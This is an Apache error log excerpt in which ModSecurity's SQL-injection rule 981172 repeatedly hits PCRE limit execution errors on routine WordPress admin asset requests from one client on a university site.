[Tue Aug 29 09:26:47.867429 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgQWq4AAAAM"]
[Tue Aug 29 09:26:47.867494 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgQWq4AAAAM"]
[Tue Aug 29 09:26:47.870489 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/common.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6ngAAAAW"]
[Tue Aug 29 09:26:47.870549 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/common.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6ngAAAAW"]
[Tue Aug 29 09:26:47.872825 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/svg-painter.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cAAAAAO"]
[Tue Aug 29 09:26:47.872882 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/svg-painter.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cAAAAAO"]
[Tue Aug 29 09:26:47.875416 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/heartbeat.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLalsAAAAJ"]
[Tue Aug 29 09:26:47.892524 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-auth-check.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nkAAAAW"]
[Tue Aug 29 09:26:47.897785 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/backbone.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLalwAAAAJ"]
[Tue Aug 29 09:26:47.898801 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/shortcode.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWq8AAAAM"]
[Tue Aug 29 09:26:47.906426 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-backbone.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9wwAAAAU"]
[Tue Aug 29 09:26:47.915480 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/plupload/wp-plupload.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrAAAAAM"]
[Tue Aug 29 09:26:47.915482 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-models.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6noAAAAW"]
[Tue Aug 29 09:26:47.922868 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/sortable.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w0AAAAU"]
[Tue Aug 29 09:26:47.922869 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/ui/mouse.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal0AAAAJ"]
[Tue Aug 29 09:26:47.930654 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelement-and-player.min.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cEAAAAO"]
[Tue Aug 29 09:26:47.931917 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelement-migrate.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrEAAAAM"]
[Tue Aug 29 09:26:47.935276 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/wp-mediaelement.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nsAAAAW"]
[Tue Aug 29 09:26:47.951075 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/api-request.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal4AAAAJ"]
[Tue Aug 29 09:26:47.961343 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/dom-ready.min.js"] [unique_id "ZO1XZ8Co-f0AAPgK@H4AAAAI"]
[Tue Aug 29 09:26:47.962811 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/a11y.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w4AAAAU"]
[Tue Aug 29 09:26:47.967788 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/clipboard.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6nwAAAAW"]
[Tue Aug 29 09:26:47.967809 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-views.min.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrIAAAAM"]
[Tue Aug 29 09:26:47.970546 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-editor.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLal8AAAAJ"]
[Tue Aug 29 09:26:47.972335 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/media-audiovideo.min.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cIAAAAO"]
[Tue Aug 29 09:26:47.984945 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mce-view.min.js"] [unique_id "ZO1XZ8Co-f0AAPgK@H8AAAAI"]
[Tue Aug 29 09:26:47.984970 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js"] [unique_id "ZO1XZ8Co-f0AAPgY6n0AAAAW"]
[Tue Aug 29 09:26:47.986846 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/image-edit.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w8AAAAU"]
[Tue Aug 29 09:26:47.986914 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/image-edit.min.js"] [unique_id "ZO1XZ8Co-f0AAPgW9w8AAAAU"]
[Tue Aug 29 09:26:47.988269 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/image-uploader.min.js"] [unique_id "ZO1XZ8Co-f0AAPgLamAAAAAJ"]
[Tue Aug 29 09:26:47.990176 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/js/plugin-handle.js"] [unique_id "ZO1XZ8Co-f0AAPgD0cMAAAAO"]
[Tue Aug 29 09:26:47.996784 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/lib/admin-notices/dismiss-notice.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrMAAAAM"]
[Tue Aug 29 09:26:47.996900 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/lib/admin-notices/dismiss-notice.js"] [unique_id "ZO1XZ8Co-f0AAPgQWrMAAAAM"]
[Tue Aug 29 09:26:48.127217 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/fonts/bwsicons.ttf"] [unique_id "ZO1XaMCo-f0AAPgW9xAAAAAU"]
[Tue Aug 29 09:26:48.127324 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/fonts/bwsicons.ttf"] [unique_id "ZO1XaMCo-f0AAPgW9xAAAAAU"]
[Tue Aug 29 09:26:57.594720 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/index.php"] [unique_id "ZO1XccCo-f0AAPgD0cQAAAAO"]
[Tue Aug 29 09:26:57.594846 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/index.php"] [unique_id "ZO1XccCo-f0AAPgD0cQAAAAO"]
[Tue Aug 29 09:26:59.227239 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/thickbox/thickbox.css"] [unique_id "ZO1Xc8Co-f0AAPgTyesAAAAQ"]
[Tue Aug 29 09:26:59.229013 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1Xc8Co-f0AAPgD0cUAAAAO"]
[Tue Aug 29 09:26:59.229072 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1Xc8Co-f0AAPgD0cUAAAAO"]
[Tue Aug 29 09:26:59.231944 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1Xc8Co-f0AAPgK@IAAAAAI"]
[Tue Aug 29 09:26:59.232011 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1Xc8Co-f0AAPgK@IAAAAAI"]
[Tue Aug 29 09:26:59.234370 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/jquery-ui.css"] [unique_id "ZO1Xc8Co-f0AAPgUgwoAAAAR"]
[Tue Aug 29 09:26:59.234437 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/jquery-ui.css"] [unique_id "ZO1Xc8Co-f0AAPgUgwoAAAAR"]
[Tue Aug 29 09:26:59.235515 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/editor.min.css"] [unique_id "ZO1Xc8Co-f0AAPgW9xEAAAAU"]
[Tue Aug 29 09:26:59.239551 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1Xc8Co-f0AAPgXNjMAAAAV"]
[Tue Aug 29 09:26:59.239609 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1Xc8Co-f0AAPgXNjMAAAAV"]
[Tue Aug 29 09:26:59.246887 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1Xc8Co-f0AAPgTyewAAAAQ"]
[Tue Aug 29 09:26:59.246972 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1Xc8Co-f0AAPgTyewAAAAQ"]
[Tue Aug 29 09:26:59.248494 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/js/chart.umd.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IEAAAAI"]
[Tue Aug 29 09:26:59.248554 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/js/chart.umd.js"] [unique_id "ZO1Xc8Co-f0AAPgK@IEAAAAI"]
[Tue Aug 29 09:26:59.258072 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/vendor/lodash.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjQAAAAV"]
[Tue Aug 29 09:26:59.273479 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/url.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgwsAAAAR"]
[Tue Aug 29 09:26:59.276071 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/site-health.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xIAAAAU"]
[Tue Aug 29 09:26:59.276129 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/site-health.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xIAAAAU"]
[Tue Aug 29 09:26:59.294589 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-ajax-response.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgwwAAAAR"]
[Tue Aug 29 09:26:59.301431 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/jquery.color.min.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xMAAAAU"]
[Tue Aug 29 09:26:59.308039 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-lists.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjUAAAAV"]
[Tue Aug 29 09:26:59.317282 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/quicktags.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgw0AAAAR"]
[Tue Aug 29 09:26:59.324614 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/jquery/jquery.query.js"] [unique_id "ZO1Xc8Co-f0AAPgW9xQAAAAU"]
[Tue Aug 29 09:26:59.343835 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/postbox.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjYAAAAV"]
[Tue Aug 29 09:26:59.343909 2023] [:error] [pid 63511] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/postbox.min.js"] [unique_id "ZO1Xc8Co-f0AAPgXNjYAAAAV"]
[Tue Aug 29 09:26:59.344624 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/edit-comments.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye0AAAAQ"]
[Tue Aug 29 09:26:59.344720 2023] [:error] [pid 63507] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/js/edit-comments.min.js"] [unique_id "ZO1Xc8Co-f0AAPgTye0AAAAQ"]
[Tue Aug 29 09:26:59.357515 2023] [:error] [pid 63508] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/date.min.js"] [unique_id "ZO1Xc8Co-f0AAPgUgw4AAAAR"]
[Tue Aug 29 09:26:59.357553 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/dist/vendor/moment.min.js"] [unique_id "ZO1Xc8Co-f0AAPgD0cYAAAAO"]
